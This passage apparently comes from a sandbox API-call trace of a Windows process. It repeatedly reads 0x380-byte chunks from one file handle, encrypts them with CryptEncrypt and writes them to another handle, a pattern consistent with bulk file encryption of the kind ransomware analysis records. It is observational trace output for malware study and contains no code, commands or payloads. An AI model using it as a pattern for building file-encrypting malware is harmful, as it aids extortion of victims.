nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.458] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.458] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.458] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.458] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.458] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.458] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.458] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.459] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.459] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.459] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.459] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.459] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.459] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.459] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.459] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.459] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.460] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.460] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.460] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.460] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.460] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.460] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.460] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.460] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.460] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.460] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.460] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.460] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.460] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.460] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.461] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.461] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.461] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.461] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.461] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.461] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.461] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.461] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.461] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.461] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.461] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.461] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.461] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.462] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.462] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.462] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.464] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.465] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.465] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.465] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.465] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.465] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.465] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.465] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.465] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.465] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.465] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.465] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.465] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.465] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.466] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.466] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.466] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.466] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.466] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.466] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.466] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.466] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.466] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.466] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.466] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.466] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.466] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.467] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.467] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.467] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.467] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.467] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.467] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.467] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.467] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.467] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.467] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.467] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.468] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.468] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.468] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.468] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.468] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.468] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.468] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.468] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.468] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.468] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.468] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.468] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.468] ReadFile (in: hFile=0x5d48, 